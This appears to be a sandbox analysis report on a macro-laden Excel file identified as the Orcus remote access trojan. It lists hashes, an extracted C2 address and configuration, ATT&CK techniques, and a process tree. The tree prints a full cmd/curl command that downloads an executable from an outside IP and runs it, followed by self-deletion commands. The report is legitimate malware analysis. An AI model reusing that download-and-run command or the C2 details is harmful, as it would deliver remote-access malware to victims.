orcus | 8258c96fcb836d6b29aa90529835ed1ee4fe6143bb5221459fe5e4a81b18d2e6

Analysis

max time kernel
134s
max time network
152s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
01-02-2025 01:45

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

GuardianQA.xlsm
Size

3.7MB
MD5

f9379219193a6ad229cb99ea103240cc
SHA1

d7776b47f7d16e66d52ff3d2cda8af982f713ea4
SHA256

8258c96fcb836d6b29aa90529835ed1ee4fe6143bb5221459fe5e4a81b18d2e6
SHA512

c8fcb2db9ecdc4aa7aefd42fc003f8bd8c2a60d1ee59a4a6d573c422812b861487b0c79fd99de4e773afa60ddd4b36a5ee447089a382ddfdfce4ffa82e661a76
SSDEEP

98304:JjD7OuWRWu3nj7fH2a6AuxvczmQjj+xwT+aNaHmt:JjOuaWu3H2a6xeOMwmt

Score

10^/10

orcus discovery rat spyware stealer

Malware Config

Extracted

Family

orcus

195.88.218.126:10134

Mutex

10dc32abacca449b81dcabfd916e9f3f

Attributes

autostart_method
Disable
enable_keylogger
false
install_path
%programfiles%\Orcus\Orcus.exe
reconnect_delay
10000
registry_keyname
Orcus
taskscheduler_taskname
Orcus
watchdog_path
AppData\OrcusWatchdog.exe

Signatures

Orcus
Orcus is a Remote Access Trojan that is being sold on underground forums.
rat spyware stealer orcus
Orcus family
orcus

Orcus main payload 1 IoCs

resource	yara_rule
behavioral2/files/0x000a000000023b7a-41.dat	family_orcus

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	4844	3680	cmd.exe	81

Orcurs Rat Executable 2 IoCs

resource	yara_rule
behavioral2/files/0x000a000000023b7a-41.dat	orcus
behavioral2/memory/3872-43-0x0000000000DA0000-0x0000000000E88000-memory.dmp	orcus

Downloads MZ/PE file 1 IoCs

flow	pid	Process
16	4500	curl.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	Guardian.exe

Executes dropped EXE 1 IoCs

pid	Process
3872	Guardian.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Guardian.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
3200	PING.EXE

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
3200	PING.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
3680	EXCEL.EXE

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	3872	Guardian.exe

Suspicious use of SetWindowsHookEx 12 IoCs

pid	Process
3680	EXCEL.EXE
3680	EXCEL.EXE
3680	EXCEL.EXE
3680	EXCEL.EXE
3680	EXCEL.EXE
3680	EXCEL.EXE
3680	EXCEL.EXE
3680	EXCEL.EXE
3680	EXCEL.EXE
3680	EXCEL.EXE
3680	EXCEL.EXE
3680	EXCEL.EXE

Suspicious use of WriteProcessMemory 25 IoCs

description	pid	Process	procid_target
PID 3680 wrote to memory of 4844	3680	EXCEL.EXE	85
PID 3680 wrote to memory of 4844	3680	EXCEL.EXE	85
PID 4844 wrote to memory of 4500	4844	cmd.exe	88
PID 4844 wrote to memory of 4500	4844	cmd.exe	88
PID 4844 wrote to memory of 3872	4844	cmd.exe	90
PID 4844 wrote to memory of 3872	4844	cmd.exe	90
PID 4844 wrote to memory of 3872	4844	cmd.exe	90
PID 3872 wrote to memory of 2228	3872	Guardian.exe	91
PID 3872 wrote to memory of 2228	3872	Guardian.exe	91
PID 3872 wrote to memory of 2228	3872	Guardian.exe	91
PID 2228 wrote to memory of 3200	2228	cmd.exe	93
PID 2228 wrote to memory of 3200	2228	cmd.exe	93
PID 2228 wrote to memory of 3200	2228	cmd.exe	93
PID 2228 wrote to memory of 5024	2228	cmd.exe	97
PID 2228 wrote to memory of 5024	2228	cmd.exe	97
PID 2228 wrote to memory of 5024	2228	cmd.exe	97
PID 2228 wrote to memory of 756	2228	cmd.exe	98
PID 2228 wrote to memory of 756	2228	cmd.exe	98
PID 2228 wrote to memory of 756	2228	cmd.exe	98
PID 2228 wrote to memory of 4488	2228	cmd.exe	99
PID 2228 wrote to memory of 4488	2228	cmd.exe	99
PID 2228 wrote to memory of 4488	2228	cmd.exe	99
PID 2228 wrote to memory of 2816	2228	cmd.exe	100
PID 2228 wrote to memory of 2816	2228	cmd.exe	100
PID 2228 wrote to memory of 2816	2228	cmd.exe	100

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\GuardianQA.xlsm"
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3680
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /V /C "set u=http://195.88.218.126:8000/Guardian.exe&set p=C:\Users\Admin\AppData\Local\Temp\Guardian.exe&curl --insecure -o !p! !u! && start !p!"
  2⤵
  - Process spawned unexpected child process
  - Suspicious use of WriteProcessMemory
  PID:4844
- - C:\Windows\system32\curl.exe
    curl --insecure -o C:\Users\Admin\AppData\Local\Temp\Guardian.exe http://195.88.218.126:8000/Guardian.exe
    3⤵
    - Downloads MZ/PE file
    PID:4500
- - C:\Users\Admin\AppData\Local\Temp\Guardian.exe
    C:\Users\Admin\AppData\Local\Temp\Guardian.exe
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3872
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\{6c4f8270-23d3-494d-8ae5-fb9ed78dea1f}.bat" "
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2228
    - - C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1
        5⤵
        System Location Discovery: System Language Discovery
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:3200
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo j "
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:5024
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" del "C:\Users\Admin\AppData\Local\Temp\Guardian.exe""
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:756
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo j "
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4488
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" del C:\Users\Admin\AppData\Local\Temp\{6c4f8270-23d3-494d-8ae5-fb9ed78dea1f}.bat"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2816

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Guardian.exe

Filesize
903KB

MD5
7735277130eafeaa269fee4b3c00f2bb

SHA1
57ae0c9d4a0f17730be54aa7dc7b808e32335101

SHA256
49d0bfca5b66fc459c26eec5d98bb98efd72f3a6d0ac64141ec7eb65e3983ec7

SHA512
a1807a81868d2464cd32949d30e11dc54710a6890bc6cffecfb3a83808a4468c8ddd090b9a412c094ca3138fe3fab21eb00b869e0b573c20a5c6435c14c5e59c

Download Submit
C:\Users\Admin\AppData\Local\Temp\{6c4f8270-23d3-494d-8ae5-fb9ed78dea1f}.bat

Filesize
185B

MD5
e01f16f6399d58845d9a83f9bd606417

SHA1
00e7cacd7ac7ff10029c614c4bb9f41b18210e88

SHA256
cedde6dec16c1bc04de5b520064200a6640748da86955c1c3747ea26539d4d28

SHA512
8b4f46ccc3fac156b13b085d4bd036624e36bf9a0f0be962c06b6d414c0849e639991235a42333a7f8f1cb996feb5c3efe1ead219e4602514b1a25ec5a8356b2

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms

Filesize
2KB

MD5
5834af59a962600de1e28e21a8b13792

SHA1
8394f77c64fe0481272d5d762ee2f601a0ed4bd9

SHA256
014b765e8ed07e3de724aeab0dc3c9b50dc3190680ac45885dc0f94d2262a4cb

SHA512
04d3f54dbba576c606a4dd25745056b5e978490c6583ec12cbb61985c817a30ed7e67068307d328dc75b525b82652ca0bd4502451367a8a543ba2fbbd3e2b6c2

Download Submit
memory/3680-28-0x00007FFBB2010000-0x00007FFBB2205000-memory.dmp

Filesize
2.0MB

Download
memory/3680-10-0x00007FFBB2010000-0x00007FFBB2205000-memory.dmp

Filesize
2.0MB

Download
memory/3680-1-0x00007FFBB20AD000-0x00007FFBB20AE000-memory.dmp

Filesize
4KB

Download
memory/3680-2-0x00007FFB72090000-0x00007FFB720A0000-memory.dmp

Filesize
64KB

Download
memory/3680-9-0x00007FFBB2010000-0x00007FFBB2205000-memory.dmp

Filesize
2.0MB

Download
memory/3680-8-0x00007FFBB2010000-0x00007FFBB2205000-memory.dmp

Filesize
2.0MB

Download
memory/3680-11-0x00007FFB6FB60000-0x00007FFB6FB70000-memory.dmp

Filesize
64KB

Download
memory/3680-7-0x00007FFBB2010000-0x00007FFBB2205000-memory.dmp

Filesize
2.0MB

Download
memory/3680-12-0x00007FFBB2010000-0x00007FFBB2205000-memory.dmp

Filesize
2.0MB

Download
memory/3680-14-0x00007FFBB2010000-0x00007FFBB2205000-memory.dmp

Filesize
2.0MB

Download
memory/3680-5-0x00007FFB72090000-0x00007FFB720A0000-memory.dmp

Filesize
64KB

Download
memory/3680-13-0x00007FFBB2010000-0x00007FFBB2205000-memory.dmp

Filesize
2.0MB

Download
memory/3680-3-0x00007FFB72090000-0x00007FFB720A0000-memory.dmp

Filesize
64KB

Download
memory/3680-18-0x00007FFBB2010000-0x00007FFBB2205000-memory.dmp

Filesize
2.0MB

Download
memory/3680-20-0x00007FFBB2010000-0x00007FFBB2205000-memory.dmp

Filesize
2.0MB

Download
memory/3680-19-0x00007FFBB2010000-0x00007FFBB2205000-memory.dmp

Filesize
2.0MB

Download
memory/3680-16-0x00007FFBB2010000-0x00007FFBB2205000-memory.dmp

Filesize
2.0MB

Download
memory/3680-6-0x00007FFBB2010000-0x00007FFBB2205000-memory.dmp

Filesize
2.0MB

Download
memory/3680-27-0x00007FFBB2010000-0x00007FFBB2205000-memory.dmp

Filesize
2.0MB

Download
memory/3680-0-0x00007FFB72090000-0x00007FFB720A0000-memory.dmp

Filesize
64KB

Download
memory/3680-15-0x00007FFB6FB60000-0x00007FFB6FB70000-memory.dmp

Filesize
64KB

Download
memory/3680-4-0x00007FFB72090000-0x00007FFB720A0000-memory.dmp

Filesize
64KB

Download
memory/3680-17-0x00007FFBB2010000-0x00007FFBB2205000-memory.dmp

Filesize
2.0MB

Download
memory/3680-63-0x00007FFBB2010000-0x00007FFBB2205000-memory.dmp

Filesize
2.0MB

Download
memory/3680-56-0x00007FFBB20AD000-0x00007FFBB20AE000-memory.dmp

Filesize
4KB

Download
memory/3680-55-0x00007FFBB2010000-0x00007FFBB2205000-memory.dmp

Filesize
2.0MB

Download
memory/3872-43-0x0000000000DA0000-0x0000000000E88000-memory.dmp

Filesize
928KB

Download
memory/3872-50-0x0000000005E70000-0x0000000005E80000-memory.dmp

Filesize
64KB

Download
memory/3872-60-0x00000000072A0000-0x00000000072EC000-memory.dmp

Filesize
304KB

Download
memory/3872-59-0x0000000007250000-0x000000000728C000-memory.dmp

Filesize
240KB

Download
memory/3872-54-0x0000000007150000-0x00000000071B6000-memory.dmp

Filesize
408KB

Download
memory/3872-47-0x00000000059A0000-0x0000000005A32000-memory.dmp

Filesize
584KB

Download
memory/3872-46-0x0000000005E80000-0x0000000006424000-memory.dmp

Filesize
5.6MB

Download
memory/3872-49-0x0000000005DE0000-0x0000000005DF8000-memory.dmp

Filesize
96KB

Download
memory/3872-58-0x00000000071F0000-0x0000000007202000-memory.dmp

Filesize
72KB

Download
memory/3872-57-0x00000000077E0000-0x0000000007DF8000-memory.dmp

Filesize
6.1MB

Download
memory/3872-51-0x0000000006800000-0x000000000680A000-memory.dmp

Filesize
40KB

Download
memory/3872-61-0x0000000007420000-0x000000000752A000-memory.dmp

Filesize
1.0MB

Download
memory/3872-62-0x0000000007E00000-0x0000000007FC2000-memory.dmp

Filesize
1.8MB

Download
memory/3872-45-0x0000000005870000-0x00000000058CC000-memory.dmp

Filesize
368KB

Download
memory/3872-44-0x0000000003240000-0x000000000324E000-memory.dmp

Filesize
56KB

Download
memory/3872-72-0x0000000007630000-0x000000000767E000-memory.dmp

Filesize
312KB

Download
memory/3872-73-0x0000000007680000-0x0000000007698000-memory.dmp

Filesize
96KB

Download
memory/3872-48-0x0000000005980000-0x0000000005992000-memory.dmp

Filesize
72KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads